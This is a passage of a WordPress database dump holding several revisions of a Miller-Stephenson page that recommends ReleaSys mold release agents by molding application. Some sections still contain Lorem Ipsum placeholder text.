looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-31 16:27:21', '2017-05-31 16:27:21', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4369, 0, '2017-05-31 16:27:57', '2017-05-31 16:27:57', '', '', '', 'publish', 'closed', 'closed', '', '4369', '', '', '2017-05-31 16:27:58', '2017-05-31 16:27:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/4369/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4370, 3, '2017-05-31 18:22:25', '2017-05-31 18:22:25', '<h2 style="text-align: left;"><strong>Choosing ReleaSys<em>™</em> By Application</strong></h2>\r\nMiller-Stephenson\'s exclusive mold release product line, ReleaSys<em>™</em> , offers technologically advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness.  However it is not always easy for engineers and plant managers to know which grade of ReleaSys would perform best in their manufacturing operation.  Criteria such as mold geometry, mold temperature, substrate, application method, etc all play a key role in deciding the best release agent for your application.  To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.  If after review of these categories you remain unsure of which grade is optimized for your molding application please contact our technical specialist at <strong>203-743-4447</strong> or submitting an inquiry to our <a href="https://www.miller-stephenson.com/tech-support/">Tech-Support team here.</a>\r\n\r\n&nbsp;\r\n<h2><strong>Advanced Composites/FRP </strong></h2>\r\n<div>\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" /><img class="wp-image-4351 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_469809758-340x340.jpg" alt="shutterstock_469809758" width="170" height="170" />Modern composites and fiber-reinforced materials are high performance substrates demand innovative mold release solutions to facilitate consistent and cost-effective release characteristics.  Mold releases for this application typically need to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.  ReleaSys technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers. Simply coat, cure, and mold.\r\n\r\nMiller-Stephenson strongly recommends use of <strong>ReleaSys<em>™</em> 9900</strong>, our water-based, no VOC, and rapidly curing release agent and <strong>ReleaSys<em>™</em> 8900</strong>, our solvent-based, low odor semi-permanent release polymer.\r\n\r\n</div>\r\n&nbsp;\r\n<h2><strong>Rotational Plastics (Rotomolding)</strong></h2>\r\n<img class="wp-image-4360 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_507408157-800x534.jpg" width="205" height="137" />\r\n\r\n<img class="wp-image-1917 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" alt="heloxy-116" width="170" height="170" />\r\n\r\nRotational Molding is both an industry and a process that is based in the use of thermoplastic resins. The rotational molding industry continues to gain popularity around the globe, and a wider variety of thermoplastic molding resins (beyond polyethylene) is becoming available. In response to this ever-evolving industry, Miller-Stephenson has developed a robust and innovative portfolio of release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter cycles using higher temperatures and increasing complex molds with tighter tolerances. Miller-Stephenson\'s ReleaSys product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application\r\n\r\nMiller-Stephenson strongly recommend <strong>ReleaSys<em>™</em> RM</strong> and <strong>ReleaSys<em>™</em> 9900</strong> for all rotational molding resins and application techniques.\r\n\r\n&nbsp;\r\n<h2 style="text-align: left;"><strong>Polyurethane (Rigid, Visco-Elastic, Flexible Foam, Skin)</strong></h2>\r\n<p style="text-align: left;"><img class="wp-image-4366 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_505351012-800x650.jpg" width="199" height="162" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.  Miller-Stephenson\'s ReleaSys release systems has specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.\r\n\r\nMiller-Stephenson strongly recommends<strong> ReleaSys<em>™</em> 8800</strong> or <strong>ReleaSys<em>™</em> 9800</strong> for water-based applications and <strong>ReleaSys 8900</strong> if solvent-based carrier fluids is desired.\r\n\r\n&nbsp;\r\n<h2 style="text-align: left;"><strong>Rubber / Silicone / Elastomers </strong></h2>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and all other elastomers,  Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years.  Whether you are performing injection, compression or transfer molding, Miller-Stephenson\'s ReleaSys product line delivers the ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. So whether you are molding O-rings, nitrile seats, heat exchanger gaskets, or motor mounts, Miller-Stephenson has a cost-effective and efficienct mold release for your application.\r\n\r\nMiller-Stephenson strongly recommends<strong> ReleaSys 8200</strong> or <strong>ReleaSys 8500</strong> both water-based products.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-31 18:22:25', '2017-05-31 18:22:25', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4371, 3, '2017-05-31 18:26:29', '2017-05-31 18:26:29', '<h2 style="text-align: left;"><strong>Choosing ReleaSys<em>™</em> By Application</strong></h2>\r\nMiller-Stephenson\'s exclusive mold release product line, ReleaSys<em>™</em> , offers technologically advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness.  However it is not always easy for engineers and plant managers to know which grade of ReleaSys would perform best in their manufacturing operation.  Criteria such as mold geometry, mold temperature, substrate, application method, etc all play a key role in deciding the best release agent for your application.  To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.  If after review of these categories you remain unsure of which grade is optimized for your molding application please contact our technical specialist at <strong>203-743-4447</strong> or submitting an inquiry to our <a href="https://www.miller-stephenson.com/tech-support/">Tech-Support team here.</a>\r\n\r\n&nbsp;\r\n<h2><strong>Advanced Composites/FRP </strong></h2>\r\n<div>\r\n\r\n<img class="wp-image-4351 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_469809758-340x340.jpg" alt="shutterstock_469809758" width="170" height="170" />Modern composites and fiber-reinforced materials are high performance substrates demand innovative mold release solutions to facilitate consistent and cost-effective release characteristics.  Mold releases for this application typically need to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.  ReleaSys technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers. Simply coat, cure, and mold.\r\n\r\nMiller-Stephenson strongly recommends use of <strong>ReleaSys<em>™</em> 9900</strong>, our water-based, no VOC, and rapidly curing release agent and <strong>ReleaSys<em>™</em> 8900</strong>, our solvent-based, low odor semi-permanent release polymer.\r\n\r\n</div>\r\n&nbsp;\r\n<h2><strong>Rotational Plastics (Rotomolding)</strong></h2>\r\n<img class="wp-image-4360 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_507408157-800x534.jpg" width="212" height="142" />\r\n\r\n&nbsp;\r\n\r\nRotational Molding is both an industry and a process that is based in the use of thermoplastic resins. The rotational molding industry continues to gain popularity around the globe, and a wider variety of thermoplastic molding resins (beyond polyethylene) is becoming available. In response to this ever-evolving industry, Miller-Stephenson has developed a robust and innovative portfolio of release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter cycles using higher temperatures and increasing complex molds with tighter tolerances. Miller-Stephenson\'s ReleaSys product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application\r\n\r\nMiller-Stephenson strongly recommend <strong>ReleaSys<em>™</em> RM</strong> and <strong>ReleaSys<em>™</em> 9900</strong> for all rotational molding resins and application                                                               techniques.\r\n\r\n&nbsp;\r\n<h2 style="text-align: left;"><strong>Polyurethane (Rigid, Visco-Elastic, Flexible Foam, Skin)</strong></h2>\r\n<p style="text-align: left;"><img class="wp-image-4366 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_505351012-800x650.jpg" width="199" height="162" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.  Miller-Stephenson\'s ReleaSys release systems has specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.\r\n\r\nMiller-Stephenson strongly recommends<strong> ReleaSys<em>™</em> 8800</strong> or <strong>ReleaSys<em>™</em> 9800</strong> for water-based applications and <strong>ReleaSys 8900</strong> if solvent-based carrier fluids is desired.\r\n\r\n&nbsp;\r\n<h2 style="text-align: left;"><strong>Rubber / Silicone / Elastomers </strong></h2>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and all other elastomers,  Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years.  Whether you are performing injection, compression or transfer molding, Miller-Stephenson\'s ReleaSys product line delivers the ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. So whether you are molding O-rings, nitrile seats, heat exchanger gaskets, or motor mounts, Miller-Stephenson has a cost-effective and efficienct mold release for your application.\r\n\r\nMiller-Stephenson strongly recommends<strong> ReleaSys 8200</strong> or <strong>ReleaSys 8500</strong> both water-based products.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-31 18:26:29', '2017-05-31 18:26:29', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4372, 2, '2017-05-31 18:33:47', '2017-05-31 18:33:47', '<h2 style="text-align: left;"><strong>Choosing ReleaSys<em>™</em> By Application</strong></h2>\r\nMiller-Stephenson\'s exclusive mold release product line, ReleaSys<em>™</em> , offers technologically advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness.  However it is not always easy for engineers and plant managers to know which grade of ReleaSys would perform best in their manufacturing operation.  Criteria such as mold geometry, mold temperature, substrate, application method, etc all play a key role in deciding the best release agent for your application.  To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.  If after review of these categories you remain unsure of which grade is optimized for your molding application please contact our technical specialist at <strong>203-743-4447</strong> or submitting an inquiry to our <a href="https://www.miller-stephenson.com/tech-support/">Tech-Support team here.</a>\r\n\r\n&nbsp;\r\n<h2><strong>Advanced Composites/FRP </strong></h2>\r\n<div>\r\n\r\n<img class="wp-image-4351 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_469809758-340x340.jpg" alt="shutterstock_469809758" width="170" height="170" />Modern composites and fiber-reinforced materials are high performance substrates demand innovative mold release solutions to facilitate consistent and cost-effective release characteristics.  Mold releases for this application typically need to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.  ReleaSys technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers. Simply coat, cure, and mold.\r\n\r\nMiller-Stephenson strongly recommends use of <strong>ReleaSys<em>™</em> 9900</strong>, our water-based, no VOC, and rapidly curing release agent and <strong>ReleaSys<em>™</em> 8900</strong>, our solvent-based, low odor semi-permanent release polymer.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2><strong>Rotational Plastics (Rotomolding)</strong></h2>\r\n<img class="wp-image-4360 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_507408157-800x534.jpg" width="212" height="142" />\r\n\r\n&nbsp;\r\n\r\nRotational Molding is both an industry and a process that is based in the use of thermoplastic resins. The rotational molding industry continues to gain popularity around the globe, and a wider variety of thermoplastic molding resins (beyond polyethylene) is becoming available. In response to this ever-evolving industry, Miller-Stephenson has developed a robust and innovative portfolio of release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter cycles using higher temperatures and increasing complex molds with tighter tolerances. Miller-Stephenson\'s ReleaSys product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application\r\n\r\nMiller-Stephenson strongly recommend <strong>ReleaSys<em>™</em> RM</strong> and <strong>ReleaSys<em>™</em> 9900</strong> for all rotational molding resins and application                                                               techniques.\r\n\r\n&nbsp;\r\n<h2 style="text-align: left;"><strong>Polyurethane (Rigid, Visco-Elastic, Flexible Foam, Skin)</strong></h2>\r\n<p style="text-align: left;"><img class="wp-image-4366 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_505351012-800x650.jpg" width="199" height="162" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.  Miller-Stephenson\'s ReleaSys release systems has specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.\r\n\r\nMiller-Stephenson strongly recommends<strong> ReleaSys<em>™</em> 8800</strong> or <strong>ReleaSys<em>™</em> 9800</strong> for water-based applications and <strong>ReleaSys 8900</strong> if solvent-based carrier fluids is desired.\r\n\r\n&nbsp;\r\n<h2 style="text-align: left;"><strong>Rubber / Silicone / Elastomers </strong></h2>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and all other elastomers,  Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years.  Whether you are performing injection, compression or transfer molding, Miller-Stephenson\'s ReleaSys product line delivers the ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. So whether you are molding O-rings, nitrile seats, heat exchanger gaskets, or motor mounts, Miller-Stephenson has a cost-effective and efficienct mold release for your application.\r\n\r\nMiller-Stephenson strongly recommends<strong> ReleaSys 8200</strong> or <strong>ReleaSys 8500</strong> both water-based products.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-31 18:33:47', '2017-05-31 18:33:47', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
